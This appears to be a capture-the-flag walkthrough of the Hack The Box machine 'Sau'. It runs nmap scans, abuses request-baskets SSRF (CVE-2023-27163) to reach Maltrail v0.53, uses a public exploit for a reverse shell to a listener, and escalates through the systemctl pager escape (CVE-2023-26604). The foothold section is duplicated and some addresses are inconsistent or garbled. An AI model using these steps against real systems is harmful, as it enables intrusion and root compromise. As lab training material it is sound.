SAU

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sS -T4 10.129.136.9 -p- -oA 10.129.136.9.portsQuick
 PORT     STATE SERVICE       VERSION
 22/tcp    open     ssh
 80/tcp    filtered http
 8338/tcp  filtered unknown
 55555/tcp open     unknown

 
root@htb:~$ sudo nmap -sV -sC -T4 10.129.24.8 -p 22,80,8338,55555 -oA 10.129.24.8.portsDetailed
 PORT     STATE SERVICE       VERSION
 22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
 |   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
 |_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
 80/tcp    filtered http
 8338/tcp  filtered unknown
 55555/tcp open     unknown
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.0 400 Bad Request
 |     Content-Type: text/plain; charset=utf-8
 |     X-Content-Type-Options: nosniff
 |     Date: Sun, 10 Aug 2025 17:58:30 GMT
 |     Content-Length: 75
 |     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
 |   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
 |     HTTP/1.1 400 Bad Request
 |     Content-Type: text/plain; charset=utf-8
 |     Connection: close
 |     Request
 |   GetRequest: 
 |     HTTP/1.0 302 Found
 |     Content-Type: text/html; charset=utf-8
 |     Location: /web
 |     Date: Sun, 10 Aug 2025 17:58:04 GMT
 |     Content-Length: 27
 |     href="/web">Found</a>.
 |   HTTPOptions: 
 |     HTTP/1.0 200 OK
 |     Allow: GET, OPTIONS
 |     Date: Sun, 10 Aug 2025 17:58:04 GMT
 |_    Content-Length: 0
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 SF-Port55555-TCP:V=7.94SVN%I=7%D=8/10%Time=6898DDAC%P=x86_64-pc-linux-gnu%
 SF:r(GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/htm
 SF:l;\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Sun,\x2010\x20Aug\
 SF:x202025\x2017:58:04\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\
 SF:"/web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x2
 SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
 SF::\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x
 SF:20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Sun,\x2010\x20Aug\
 SF:x202025\x2017:58:04\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ
 SF:est,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pla
 SF:in;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reque
 SF:st")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
 SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
 SF:x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
 SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
 SF:\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x204
 SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
 SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,6
 SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
 SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
 SF:r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
 SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
 SF:20Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\
 SF:r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Opti
 SF:ons:\x20nosniff\r\nDate:\x20Sun,\x2010\x20Aug\x202025\x2017:58:30\x20GM
 SF:T\r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20
 SF:name\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}
 SF:\$\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
 SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
 SF:x20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
 SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
 SF:close\r\n\r\n400\x20Bad\x20Request");
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln -T4 10.129.24.8 -p 22,80,8338,55555 -oA 10.129.24.8.vulnScan
 PORT   STATE SERVICE
 22/tcp    open     ssh
 80/tcp    filtered http
 8338/tcp  filtered unknown
 55555/tcp open     unknown

 * the --script=vuln category runs NSE scripts that focus specifically on detecting known 
   vulnerabilities in the service running on each port
    - e.g., weak configurations, or known vulnerabilities in a service such as redis
       - if no results are found then the service may be fully patched - but it may also
         be a service nmap has no script for (here the service on 55555 was reported as
         unrecognized), so an empty result is not evidence that it is safe

FOOTHOLD

Submit the flag located in the puma user's home directory.
//walk the application
root@htb:~$ BROWSER > http://10.129.24.8:55555/web

 * can create a basket
    - Basket '7gk1iew' is successfully created!
      Your token is: sLWaXc5ABZjcXWWqx0g-CLed-peaROvoXUkHXIDJQZqe
      Powered by request-baskets | Version: 1.2.1 
      
 * can view created basket
    - Basket: 7gk1iew
      Empty basket!
      This basket is empty, send requests to http://10.129.24.8:55555/7gk1iew 
      and they will appear here.

//conduct code review
root@htb:~$ BROWSER > http://10.129.24.8:55555/web > CTRL + U
  <script>
  (function($) {
    // Client-side controller for the request-baskets index page (/web):
    // suggests a basket name, creates the basket through the JSON API, and
    // lists the baskets remembered in localStorage. Everything lives inside
    // this IIFE, so only the jQuery handlers registered below are reachable.
    function randomName() {
      // Suggested default name only (the user can edit it before submitting);
      // Math.random() is not a cryptographic source, which is fine for a name
      // but would not be for the token - the token comes from the server.
      var name = Math.random().toString(36).substring(2, 9);
      $("#basket_name").val(name);
    }

    function onAjaxError(jqXHR) {
      // 401 means the API wanted a master token: open the token dialog
      // (keyboard:false presumably keeps ESC from dismissing it) instead of
      // showing an error.
      if (jqXHR.status == 401) {
        $("#master_token_dialog").modal({ keyboard : false });
      } else {
        // Review note: the raw response body (jqXHR.responseText) is rendered
        // with .html(), which interprets markup, so whatever the API returns
        // for an error lands in the DOM unescaped. That is safe only while
        // the API keeps returning plain text; .text() would be the defensive
        // choice for both fields here.
        $("#error_message_label").html("HTTP " + jqXHR.status + " - " + jqXHR.statusText);
        $("#error_message_text").html(jqXHR.responseText);
        $("#error_message").modal();
      }
    }

    function addBasketName(name) {
      // Appends a list entry linking to /web/<name>. The name goes straight
      // into an id attribute, an href and the link text by string
      // concatenation; keeping markup characters out relies on the
      // server-side name pattern (the 400 response for a bad name reports
      // ^[\w\d\-_\.]{1,250}$), not on anything done in this page.
      $("#empty_list").addClass("hide");
      $("#baskets").append("<li id='basket_" + name + "'><a href='/web/" + name + "'>" + name + "</a></li>");
    }

    function showMyBaskets() {
      // Rebuilds the "my baskets" list from every localStorage key prefixed
      // "basket_" (one key per basket created in this browser; the value is
      // that basket's token). Names read back from storage are trusted on
      // every page load exactly as they were when stored.
      $("#empty_list").removeClass("hide");
      for (var i = 0; i < localStorage.length; i++) {
        var key = localStorage.key(i);
        if (key && key.indexOf("basket_") == 0) {
          addBasketName(key.substring("basket_".length));
        }
      }
    }

    function createBasket() {
      // POST /api/baskets/<name>. The name is appended to the URL path without
      // encoding, so the server's pattern check is what rejects odd names.
      // The Authorization header carries the master token from sessionStorage
      // (null when none has been saved, i.e. an unauthenticated create).
      var basket = $.trim($("#basket_name").val());
      if (basket) {
        $.ajax({
          method: "POST",
          url: "/api/baskets/" + basket,
          headers: {
            "Authorization" : sessionStorage.getItem("master_token")
          }
        }).done(function(data) {
          // The token is kept client-side in localStorage (presumably the
          // credential for managing this basket - it is the only secret the UI
          // shows). Anything that can read localStorage in this origin - an
          // injected script, a shared browser profile - can read it too.
          localStorage.setItem("basket_" + basket, data.token);
          // basket and data.token are rendered as HTML here, the same trust
          // assumption as in addBasketName.
          $("#created_message_text").html("<p>Basket '" + basket +
            "' is successfully created!</p><p>Your token is: <mark>" + data.token + "</mark></p>");
          $("#basket_link").attr("href", "/web/" + basket);
          $("#created_message").modal();

          addBasketName(basket);
        }).always(function() {
          // Whether or not the create succeeded, suggest a fresh name.
          randomName();
        }).fail(onAjaxError);
      } else {
        $("#error_message_label").html("Missing basket name");
        $("#error_message_text").html("Please, provide a name of basket you would like to create");
        $("#error_message").modal();
      }
    }

    function saveMasterToken() {
      // Called when the master-token dialog closes: moves the typed token into
      // sessionStorage (cleared from the input first) or removes a stored one
      // when the field was left empty.
      var token = $("#master_token").val();
      $("#master_token").val("");
      $("#master_token_dialog").modal("hide");
      if (token) {
        sessionStorage.setItem("master_token", token);
      } else {
        sessionStorage.removeItem("master_token");
      }
    }

    $(document).ready(function() {
      // Show the origin the baskets collect on (taken from window.location),
      // wire the form/button/dialog handlers, then populate the page.
      $("#base_uri").html(window.location.protocol + "//" + window.location.host + "/");
      $("#create_basket").on("submit", function(event) {
        createBasket();
        event.preventDefault();
      });
      $("#refresh").on("click", function(event) {
        randomName();
      });
      $("#master_token_dialog").on("hidden.bs.modal", function (event) {
        saveMasterToken();
      });
      randomName();
      showMyBaskets();
    });
  })(jQuery);
  </script>
  
 * potentially vulnerable section
    - /api/baskets/" + basket
 
//verify w/ AI for second opinion
root@htb:~$ BROWSER > https://chatgpt.com
 query: identify vulnerabilities in the following code snippet
  <script>
  ...
  </script>
  
 response:
  1.DOM-based XSS (Cross-Site Scripting)
     - directly inserting user-controlled values into the DOM via .html() and 
       string concatenation without sanitizing them
     - If basket or data.token or jqXHR.responseText contains HTML or JavaScript
       (especially if they come from untrusted sources like the URL or API), an 
       attacker could inject arbitrary scripts.
        - $("#created_message_text").html("<p>Basket '" + basket + "' is successfully created!</p><p>Your token is: <mark>" + data.token + "</mark></p>");
        - $("#error_message_text").html(jqXHR.responseText);
        - $("#baskets").append("<li id='basket_" + name + "'><a href='/web/" + name + "'>" + name + "</a></li>");
  2.Insecure use of localStorage and sessionStorage for sensitive tokens
     - storing authentication tokens in localStorage and sessionStorage:
     - These are accessible to any JavaScript running on the page, including 
       malicious scripts injected via XSS. If XSS occurs, an attacker can steal 
       all tokens.
        - localStorage.setItem("basket_" + basket, data.token);
          sessionStorage.setItem("master_token", token);
  3.No input validation on basket name
     - The basket name comes from user input and is concatenated into both: 
        - HTML
        - API endpoints (url: "/api/baskets/" + basket)
     - If the API doesn’t properly validate input, this could lead to:
        - XSS (as mentioned above)
        - Path traversal or unexpected API behavior if special characters are allowed.
  4.Revealing sensitive server error responses
     - display raw jqXHR.responseText from failed AJAX calls:
     - If the backend returns debug details (stack traces, SQL errors), you may 
       leak sensitive server info to the browser.
        - $("#error_message_text").html(jqXHR.responseText);
  5.No CSRF protection
     - This code makes authenticated requests (POST /api/baskets/...) but 
       doesn’t include CSRF protections. If an attacker can get the user to 
       visit a malicious page, they might trigger unwanted API calls while the
       master_token is in sessionStorage.
//research vulnerability
root@htb:~$ BROWSER > google.com
 search: request-baskets | Version: 1.2.1
  https://notes.sjtu.edu.cn/s/MUUhEymt7#
  https://github.com/mathias-mrsn/request-baskets-v121-ssrf
  https://packetstorm.news/files/id/174128
  https://www.twingate.com/blog/tips/cve-2023-27163
  https://medium.com/@li_allouche/request-baskets-1-2-1-server-side-request-forgery-cve-2023-27163-2bab94f201f7
 
 search: cve-2023-27163
  https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMDARKLYNXREQUESTBASKETS-5406297
  https://github.com/entr0pie/CVE-2023-27163

//test
root@htb:~$ BROWSER > http://10.129.24.8:55555
 Request Baskets > Create
  Created
  Basket 'wnxbq0g' is successfully created!
  Your token is: KtnGwoOm2Gp_aTNxThR9KuJuvgKlOv2Ctv9d0ZZmwdkq
  Open Basket
 Basket: wnxbq0g > Settings (gear icon)
  Forward URL: http://{attackingIP}:{port}
   Basket is reconfigured
   
 * set the Forward URL to the attacking machine's IP and apply changes

//send a GET request to the created basket and watch what the listener receives
root@htb:~$ nc -nlvp 8080
 ...
root@htb:~$ curl http://10.129.220.189:55555/{basketID}
 Basket: 2iqxygg
 Requests are collected at http://10.129.229.26:55555/2iqxygg
 Requests: 1 (1)
 [GET]
 10:25:14 PM
 8/12/2025
 /2iqxygg
 Headers
 
root@htb:~$ nc ...
 ...
 listening on [any] 8080 ...
 connect to [10.10.14.114] from (UNKNOWN) [10.129.220.189] 42824
 GET / HTTP/1.1
 Host: 10.10.14.114:8080
 User-Agent: curl/7.88.1
 Accept: */*
 X-Do-Not-Forward: 1
 Accept-Encoding: gzip 
//point the basket's forward URL at the target's own loopback address
root@htb:~$ BROWSER > http://10.129.24.8:55555
 ...
 Basket: wnxbq0g > Settings (gear icon)
  Forward URL: http://127.0.0.180
   Basket is reconfigured
 Proxy Response: enabled
 Expand Forward Path: enabled
  
 * set the Forward URL to the target's own loopback address on port 80: the basket
   then relays requests to the web service on port 80, which nmap showed as filtered
   from the outside but which the host can reach itself
 * Proxy Response allows the basket to behave as a full proxy: responses from 
   the underlying service configured in forward_url are passed back to clients 
   of original requests. The configuration of basket responses is ignored in 
   this case.
 * Expand Forward Path: the forward URL's path is expanded with the original request's
   path when that HTTP request contains a compound path

root@htb:~$ BROWSER > http://10.129.229.26:55555/2iqxygg
 Documentation
 |
 Wiki
 |
 Issues
 |
 Log In
 ...
 
 Powered by Maltrail (v0.53)
  Hide threat
  Report false positive

root@htb:~$ BROWSER > google.com
 search: Powered by Maltrail (v0.53)
 results
  - https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
    https://github.com/spookier/Maltrail-v0.53-Exploit
    
//PoC
root@htb:~$ git clone https://github.com/spookier/Maltrail-v0.53-Exploit.git
root@htb:~$ cd Maltrail-v0.53-Exploit/
root@htb:~$ python3 exploit.py
 Error. Needs listening IP, PORT and target URL.
 
 * syntax: python3 exploit.py [listening_IP] [listening_PORT] [target_URL]
 
root@htb:~$ nc -nlvp 1337
root@htb:~$ python3 exploit.py 10.10.14.228 1337 http://10.129.229.26:55555/{basketID}

root@htb:~$ nc ...
 listening on [any] 1337 ...
 connect to [10.10.14.228] from (UNKNOWN) [10.129.229.26] 38548
$ whoami
 puma
 
//activate stable shell
$ script /dev/null -c bash
 Script started, file is /dev/null
puma@sau:/opt/maltrail$ 

 * add the following if required 
    # Ctrl + z
    stty -raw echo; fg
    # Enter (Return) x2

puma@sau:/opt/maltrail$ ls /home/puma
 user.txt
puma@sau:/opt/maltrail$ cat /home/puma/user.txt
 71d11e50696626f40cf1987eea11ea95
Submit the flag located in the root user's home directory.
//walk the application
root@htb:~$ BROWSER > http://10.129.24.8:55555/web

 * can create a basket
    - Basket '7gk1iew' is successfully created!
      Your token is: sLWaXc5ABZjcXWWqx0g-CLed-peaROvoXUkHXIDJQZqe
      Powered by request-baskets | Version: 1.2.1 
      
 * can view created basket
    - Basket: 7gk1iew
      Empty basket!
      This basket is empty, send requests to http://10.129.24.8:55555/7gk1iew 
      and they will appear here.

//conduct code review
root@htb:~$ BROWSER > http://10.129.24.8:55555/web > CTRL + U
  <script>
  (function($) {
    function randomName() {
      var name = Math.random().toString(36).substring(2, 9);
      $("#basket_name").val(name);
    }

    function onAjaxError(jqXHR) {
      if (jqXHR.status == 401) {
        $("#master_token_dialog").modal({ keyboard : false });
      } else {
        $("#error_message_label").html("HTTP " + jqXHR.status + " - " + jqXHR.statusText);
        $("#error_message_text").html(jqXHR.responseText);
        $("#error_message").modal();
      }
    }

    function addBasketName(name) {
      $("#empty_list").addClass("hide");
      $("#baskets").append("<li id='basket_" + name + "'><a href='/web/" + name + "'>" + name + "</a></li>");
    }

    function showMyBaskets() {
      $("#empty_list").removeClass("hide");
      for (var i = 0; i < localStorage.length; i++) {
        var key = localStorage.key(i);
        if (key && key.indexOf("basket_") == 0) {
          addBasketName(key.substring("basket_".length));
        }
      }
    }

    function createBasket() {
      var basket = $.trim($("#basket_name").val());
      if (basket) {
        $.ajax({
          method: "POST",
          url: "/api/baskets/" + basket,
          headers: {
            "Authorization" : sessionStorage.getItem("master_token")
          }
        }).done(function(data) {
          localStorage.setItem("basket_" + basket, data.token);
          $("#created_message_text").html("<p>Basket '" + basket +
            "' is successfully created!</p><p>Your token is: <mark>" + data.token + "</mark></p>");
          $("#basket_link").attr("href", "/web/" + basket);
          $("#created_message").modal();

          addBasketName(basket);
        }).always(function() {
          randomName();
        }).fail(onAjaxError);
      } else {
        $("#error_message_label").html("Missing basket name");
        $("#error_message_text").html("Please, provide a name of basket you would like to create");
        $("#error_message").modal();
      }
    }

    function saveMasterToken() {
      var token = $("#master_token").val();
      $("#master_token").val("");
      $("#master_token_dialog").modal("hide");
      if (token) {
        sessionStorage.setItem("master_token", token);
      } else {
        sessionStorage.removeItem("master_token");
      }
    }

    $(document).ready(function() {
      $("#base_uri").html(window.location.protocol + "//" + window.location.host + "/");
      $("#create_basket").on("submit", function(event) {
        createBasket();
        event.preventDefault();
      });
      $("#refresh").on("click", function(event) {
        randomName();
      });
      $("#master_token_dialog").on("hidden.bs.modal", function (event) {
        saveMasterToken();
      });
      randomName();
      showMyBaskets();
    });
  })(jQuery);
  </script>
  
 * potentially vulnerable section
    - /api/baskets/" + basket
 
//verify w/ AI for second opinion
root@htb:~$ BROWSER > https://chatgpt.com
 query: identify vulnerabilities in the following code snippet
  <script>
  ...
  </script>
  
 response:
  1.DOM-based XSS (Cross-Site Scripting)
     - directly inserting user-controlled values into the DOM via .html() and 
       string concatenation without sanitizing them
     - If basket or data.token or jqXHR.responseText contains HTML or JavaScript
       (especially if they come from untrusted sources like the URL or API), an 
       attacker could inject arbitrary scripts.
        - $("#created_message_text").html("<p>Basket '" + basket + "' is successfully created!</p><p>Your token is: <mark>" + data.token + "</mark></p>");
        - $("#error_message_text").html(jqXHR.responseText);
        - $("#baskets").append("<li id='basket_" + name + "'><a href='/web/" + name + "'>" + name + "</a></li>");
  2.Insecure use of localStorage and sessionStorage for sensitive tokens
     - storing authentication tokens in localStorage and sessionStorage:
     - These are accessible to any JavaScript running on the page, including 
       malicious scripts injected via XSS. If XSS occurs, an attacker can steal 
       all tokens.
        - localStorage.setItem("basket_" + basket, data.token);
          sessionStorage.setItem("master_token", token);
  3.No input validation on basket name
     - The basket name comes from user input and is concatenated into both: 
        - HTML
        - API endpoints (url: "/api/baskets/" + basket)
     - If the API doesn’t properly validate input, this could lead to:
        - XSS (as mentioned above)
        - Path traversal or unexpected API behavior if special characters are allowed.
  4.Revealing sensitive server error responses
     - display raw jqXHR.responseText from failed AJAX calls:
     - If the backend returns debug details (stack traces, SQL errors), you may 
       leak sensitive server info to the browser.
        - $("#error_message_text").html(jqXHR.responseText);
  5.No CSRF protection
     - This code makes authenticated requests (POST /api/baskets/...) but 
       doesn’t include CSRF protections. If an attacker can get the user to 
       visit a malicious page, they might trigger unwanted API calls while the
       master_token is in sessionStorage.
//research vulnerability
root@htb:~$ BROWSER > google.com
 search: request-baskets | Version: 1.2.1
  https://notes.sjtu.edu.cn/s/MUUhEymt7#
  https://github.com/mathias-mrsn/request-baskets-v121-ssrf
  https://packetstorm.news/files/id/174128
  https://www.twingate.com/blog/tips/cve-2023-27163
  https://medium.com/@li_allouche/request-baskets-1-2-1-server-side-request-forgery-cve-2023-27163-2bab94f201f7
 
 search: cve-2023-27163
  https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMDARKLYNXREQUESTBASKETS-5406297
  https://github.com/entr0pie/CVE-2023-27163

//test
root@htb:~$ BROWSER > http://10.129.24.8:55555
 Request Baskets > Create
  Created
  Basket 'wnxbq0g' is successfully created!
  Your token is: KtnGwoOm2Gp_aTNxThR9KuJuvgKlOv2Ctv9d0ZZmwdkq
  Open Basket
 Basket: wnxbq0g > Settings (gear icon)
  Forward URL: http://{attackingIP}:{port}
   Basket is reconfigured
   
 * set the Forward URL to the attacking machine's IP and apply changes

//send a GET request to the created basket and watch what the listener receives
root@htb:~$ nc -nlvp 8080
 ...
root@htb:~$ curl http://10.129.220.189:55555/{basketID}
 Basket: 2iqxygg
 Requests are collected at http://10.129.229.26:55555/2iqxygg
 Requests: 1 (1)
 [GET]
 10:25:14 PM
 8/12/2025
 /2iqxygg
 Headers
 
root@htb:~$ nc ...
 ...
 listening on [any] 8080 ...
 connect to [10.10.14.114] from (UNKNOWN) [10.129.220.189] 42824
 GET / HTTP/1.1
 Host: 10.10.14.114:8080
 User-Agent: curl/7.88.1
 Accept: */*
 X-Do-Not-Forward: 1
 Accept-Encoding: gzip 
//point the basket's forward URL at the target's own loopback address
root@htb:~$ BROWSER > http://10.129.24.8:55555
 ...
 Basket: wnxbq0g > Settings (gear icon)
  Forward URL: http://127.0.0.180
   Basket is reconfigured
 Proxy Response: enabled
 Expand Forward Path: enabled
  
 * set the Forward URL to the target's own loopback address on port 80: the basket
   then relays requests to the web service on port 80, which nmap showed as filtered
   from the outside but which the host can reach itself
 * Proxy Response allows the basket to behave as a full proxy: responses from 
   the underlying service configured in forward_url are passed back to clients 
   of original requests. The configuration of basket responses is ignored in 
   this case.
 * Expand Forward Path: the forward URL's path is expanded with the original request's
   path when that HTTP request contains a compound path

root@htb:~$ BROWSER > http://10.129.229.26:55555/2iqxygg
 Documentation
 |
 Wiki
 |
 Issues
 |
 Log In
 ...
 
 Powered by Maltrail (v0.53)
  Hide threat
  Report false positive

root@htb:~$ BROWSER > google.com
 search: Powered by Maltrail (v0.53)
 results
  - https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
    https://github.com/spookier/Maltrail-v0.53-Exploit
    
//PoC
root@htb:~$ git clone https://github.com/spookier/Maltrail-v0.53-Exploit.git
root@htb:~$ cd Maltrail-v0.53-Exploit/
root@htb:~$ python3 exploit.py
 Error. Needs listening IP, PORT and target URL.
 
 * syntax: python3 exploit.py [listening_IP] [listening_PORT] [target_URL]
 
root@htb:~$ nc -nlvp 1337
root@htb:~$ python3 exploit.py 10.10.14.228 1337 http://10.129.229.26:55555/{basketID}

root@htb:~$ nc ...
 listening on [any] 1337 ...
 connect to [10.10.14.228] from (UNKNOWN) [10.129.229.26] 38548
$ whoami
 puma
 
//activate stable shell
$ script /dev/null -c bash
 Script started, file is /dev/null
puma@sau:/opt/maltrail$ 

 * add the following if required 
    # Ctrl + z
    stty -raw echo; fg
    # Enter (Return) x2

puma@sau:/opt/maltrail$ ls /home/puma
 user.txt
puma@sau:/opt/maltrail$ cat /home/puma/user.txt
 71d11e50696626f40cf1987eea11ea95
//privesc
puma@sau:/opt/maltrail$ sudo -l
 Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

 User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
    
puma@sau:/opt/maltrail$ systemctl --version
 systemd 245 (245.4-4ubuntu3.22)
 +PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN2 -IDN +PCRE2 default-hierarchy=hybrid
 
root@htb:~$ BROWSER >  google.com
 search: systemd 245 (245.4-4ubuntu3.22)
 results: https://packetstorm.news/files/id/174130
 
 * # Exploit Title: systemd 246 - Local Privilege Escalation
   # Exploit Author: Iyaad Luqman K (init_6)
   # Application: systemd 246
   # Tested on: Ubuntu 22.04
   # CVE: CVE-2023-26604

   systemd 246 was discovered to contain a privilege escalation vulnerability when the `systemctl status` command can be run as the root user (the CVE covers systemd releases before 247, so the target's 245 is affected as well). 
   This vulnerability allows a local attacker to gain root privileges.

   ## Proof Of Concept:
   1. Run the systemctl command which can be run as root user.
      sudo /usr/bin/systemctl status any_service

   2. The output is opened in a pager (less) which allows us to execute 
      arbitrary commands.

   3. Type in !/bin/bash in the pager to spawn a shell as root user.
//exploit the vulnerability
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
 WARNING: terminal is not fully functional
 -  (press RETURN)!/bin/bash
 !//bbiinn//bbaasshh!/bin/bash
 
 * this opens a new shell with the same privileges as the pager itself - and the pager
   was spawned by systemctl running as root under sudo, so the shell is root; systemd
   247+ sets LESSSECURE=1 before starting the pager, which makes less refuse this
   escape, and a sudo rule for a command that invokes a pager should be avoided or
   restricted to --no-pager / SYSTEMD_PAGER=cat

root@sau:/opt/maltrail# ls /root
 go  root.txt
root@sau:/opt/maltrail# cat /root/root.txt
 04dfee9342f1b037f03e1e194ab265ee
